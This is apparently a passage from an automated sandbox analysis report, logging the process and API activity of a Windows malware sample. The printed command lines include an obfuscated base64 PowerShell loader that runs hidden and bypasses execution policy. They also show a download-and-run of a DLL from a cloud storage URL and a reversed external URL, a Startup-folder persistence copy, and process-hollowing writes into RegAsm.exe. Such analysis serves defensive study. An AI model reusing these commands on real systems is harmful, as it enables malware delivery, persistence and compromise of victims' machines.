ALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
parent_process wscript.exe martian_process cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Process injection Process 2828 resumed a thread in remote process 2980
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000354
suspend_count: 1
process_identifier: 2980
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2140
thread_handle: 0x000002fc
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000304
1 1 0

CreateProcessInternalW

thread_identifier: 2636
thread_handle: 0x000002a8
process_identifier: 2632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000304
1 1 0

CreateProcessInternalW

thread_identifier: 2208
thread_handle: 0x00000084
process_identifier: 2204
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\PING.EXE
track: 1
command_line: ping 127.0.0.1 -n 5
filepath_r: C:\Windows\system32\PING.EXE
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2316
thread_handle: 0x00000088
process_identifier: 2312
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

NtResumeThread

thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2204
1 0 0

CreateProcessInternalW

thread_identifier: 2360
thread_handle: 0x00000084
process_identifier: 2356
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x0000044c
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x000004a0
suspend_count: 1
process_identifier: 2356
1 0 0

NtResumeThread

thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2632
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2632
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2632
1 0 0

CreateProcessInternalW

thread_identifier: 2832
thread_handle: 0x0000044c
process_identifier: 2828
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/2/wodniw/251.871.64.891//:ptth'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0

NtResumeThread

thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2632
1 0 0

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x0000030c
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x00000464
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x00000588
suspend_count: 1
process_identifier: 2828
1 0 0

CreateProcessInternalW

thread_identifier: 2984
thread_handle: 0x00000354
process_identifier: 2980
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000035c
1 1 0

NtGetContextThread

thread_handle: 0x00000354
1 0 0

NtAllocateVirtualMemory

process_identifier: 2980
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000035c
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL­Feà 0®Í à@  @…ÈÌSàF  H.text$­ ® `.rsrcFà°@@.reloc ¶@B
base_address: 0x00400000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee5027e73-68a7-491a-b852-8635a83d4256.exe(LegalCopyright |)OriginalFilenamee5027e73-68a7-491a-b852-8635a83d4256.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer: À =
base_address: 0x00440000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4443422
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000354
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x00000354
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x000003d0
suspend_count: 1
process_identifier: 2828
1 0 0

NtResumeThread

thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x000001ec
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x000002d8
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x00000340
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x000003b4
suspend_count: 1
process_identifier: 2980
1 0 0

NtResumeThread

thread_handle: 0x000003e4
suspend_count: 1
process_identifier: 2980
1 0 0
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe